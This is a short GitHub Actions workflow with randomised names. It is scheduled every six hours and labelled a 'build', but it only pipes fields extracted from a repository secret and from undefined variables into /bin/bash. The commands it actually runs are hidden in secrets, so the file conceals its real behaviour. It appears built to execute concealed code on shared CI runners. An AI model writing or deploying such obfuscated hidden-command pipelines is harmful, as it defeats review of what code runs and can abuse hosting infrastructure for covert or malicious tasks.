name: liulijun1819
on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liulijun1819
        env:
          dmj79208: ${{ secrets.dmj79208 }}
        run: |
          echo $dmj79208 | jq -r .h717 | /bin/bash
          echo $toicl0 | jq -r .fnau25 | /bin/bash
          echo $eo83 | jq -r .xed8 | /bin/bash
          echo $fxvd7 | jq -r .czc33 | /bin/bash
          echo $pbc709 | jq -r .f8957 | /bin/bash
          echo $s8764 | jq -r .tyzk38335 | /bin/bash
          echo $qqn8905 | jq -r .ekt5 | /bin/bash

